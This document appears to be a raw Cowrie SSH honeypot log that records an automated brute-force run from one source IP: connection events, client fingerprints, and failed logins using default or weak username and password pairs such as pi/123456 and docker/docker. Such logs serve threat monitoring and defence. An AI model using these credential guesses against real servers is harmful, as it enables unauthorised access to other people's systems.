{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60656,"dst_ip":"1.2.3.4","dst_port":22,"session":"e900ffe1c3f4","protocol":"ssh","message":"New connection: 212.227.125.160:60656 (1.2.3.4:22) [session: e900ffe1c3f4]","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.668800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.670061Z","src_ip":"212.227.125.160","session":"e900ffe1c3f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.726082Z","src_ip":"212.227.125.160","session":"e900ffe1c3f4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.728305Z","src_ip":"212.227.125.160","session":"d9a24380d80b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48962,"dst_ip":"1.2.3.4","dst_port":22,"session":"729755a34c73","protocol":"ssh","message":"New connection: 212.227.125.160:48962 (1.2.3.4:22) [session: 729755a34c73]","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.769364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.773740Z","src_ip":"212.227.125.160","session":"729755a34c73"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:56.832373Z","src_ip":"212.227.125.160","session":"729755a34c73"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:57.023949Z","src_ip":"212.227.125.160","session":"729755a34c73"}
{"eventid":"cowrie.login.failed","username":"rtelekom","password":"rtelekom","message":"login attempt [rtelekom/rtelekom] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:57.436351Z","src_ip":"212.227.125.160","session":"e900ffe1c3f4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.125604Z","src_ip":"212.227.125.160","session":"729755a34c73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48970,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea95d56f894e","protocol":"ssh","message":"New connection: 212.227.125.160:48970 (1.2.3.4:22) [session: ea95d56f894e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.189944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.262398Z","src_ip":"212.227.125.160","session":"ea95d56f894e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.263097Z","src_ip":"212.227.125.160","session":"ea95d56f894e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.487711Z","src_ip":"212.227.125.160","session":"e900ffe1c3f4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:58.684448Z","src_ip":"212.227.125.160","session":"ea95d56f894e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:59.757158Z","src_ip":"212.227.125.160","session":"ea95d56f894e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48982,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eb17fe49a15","protocol":"ssh","message":"New connection: 212.227.125.160:48982 (1.2.3.4:22) [session: 7eb17fe49a15]","sensor":"my-vps","timestamp":"2025-08-26T11:33:59.833878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:59.881329Z","src_ip":"212.227.125.160","session":"7eb17fe49a15"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:59.883179Z","src_ip":"212.227.125.160","session":"7eb17fe49a15"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:00.274398Z","src_ip":"212.227.125.160","session":"7eb17fe49a15"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:01.371501Z","src_ip":"212.227.125.160","session":"7eb17fe49a15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48984,"dst_ip":"1.2.3.4","dst_port":22,"session":"088dc2618db3","protocol":"ssh","message":"New connection: 212.227.125.160:48984 (1.2.3.4:22) [session: 088dc2618db3]","sensor":"my-vps","timestamp":"2025-08-26T11:34:01.435384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:01.494496Z","src_ip":"212.227.125.160","session":"088dc2618db3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:01.495421Z","src_ip":"212.227.125.160","session":"088dc2618db3"}
{"eventid":"cowrie.login.failed","username":"pi","password":"P@ssw0rd","message":"login attempt [pi/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:01.955469Z","src_ip":"212.227.125.160","session":"088dc2618db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33192,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab7cd66c01e2","protocol":"ssh","message":"New connection: 212.227.125.160:33192 (1.2.3.4:22) [session: ab7cd66c01e2]","sensor":"my-vps","timestamp":"2025-08-26T11:34:02.516212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:02.516994Z","src_ip":"212.227.125.160","session":"ab7cd66c01e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:02.570614Z","src_ip":"212.227.125.160","session":"ab7cd66c01e2"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"vncuser","message":"login attempt [vncuser/vncuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:02.729486Z","src_ip":"212.227.125.160","session":"ab7cd66c01e2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:03.459058Z","src_ip":"212.227.125.160","session":"088dc2618db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49338,"dst_ip":"1.2.3.4","dst_port":22,"session":"acd39f9deee1","protocol":"ssh","message":"New connection: 212.227.125.160:49338 (1.2.3.4:22) [session: acd39f9deee1]","sensor":"my-vps","timestamp":"2025-08-26T11:34:03.574541Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:03.788296Z","src_ip":"212.227.125.160","session":"ab7cd66c01e2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:04.159508Z","src_ip":"212.227.125.160","session":"acd39f9deee1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:04.160387Z","src_ip":"212.227.125.160","session":"acd39f9deee1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:05.257095Z","src_ip":"212.227.125.160","session":"acd39f9deee1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:06.302008Z","src_ip":"212.227.125.160","session":"acd39f9deee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49676,"dst_ip":"1.2.3.4","dst_port":22,"session":"e48955722c99","protocol":"ssh","message":"New connection: 212.227.125.160:49676 (1.2.3.4:22) [session: e48955722c99]","sensor":"my-vps","timestamp":"2025-08-26T11:34:06.345192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:06.346024Z","src_ip":"212.227.125.160","session":"e48955722c99"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:06.389251Z","src_ip":"212.227.125.160","session":"e48955722c99"}
{"eventid":"cowrie.login.failed","username":"pi","password":"brigante","message":"login attempt [pi/brigante] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:06.519552Z","src_ip":"212.227.125.160","session":"e48955722c99"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:07.565269Z","src_ip":"212.227.125.160","session":"e48955722c99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49780,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4582cf70d58","protocol":"ssh","message":"New connection: 212.227.125.160:49780 (1.2.3.4:22) [session: b4582cf70d58]","sensor":"my-vps","timestamp":"2025-08-26T11:34:07.606375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:07.607450Z","src_ip":"212.227.125.160","session":"b4582cf70d58"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:07.649235Z","src_ip":"212.227.125.160","session":"b4582cf70d58"}
{"eventid":"cowrie.login.failed","username":"pi","password":"samar","message":"login attempt [pi/samar] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:07.785858Z","src_ip":"212.227.125.160","session":"b4582cf70d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33964,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2a71c86e658","protocol":"ssh","message":"New connection: 212.227.125.160:33964 (1.2.3.4:22) [session: e2a71c86e658]","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.423726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.424354Z","src_ip":"212.227.125.160","session":"e2a71c86e658"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.489357Z","src_ip":"212.227.125.160","session":"e2a71c86e658"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.685297Z","src_ip":"212.227.125.160","session":"e2a71c86e658"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.893582Z","src_ip":"212.227.125.160","session":"b4582cf70d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49922,"dst_ip":"1.2.3.4","dst_port":22,"session":"325c436e68be","protocol":"ssh","message":"New connection: 212.227.125.160:49922 (1.2.3.4:22) [session: 325c436e68be]","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.946007Z"}
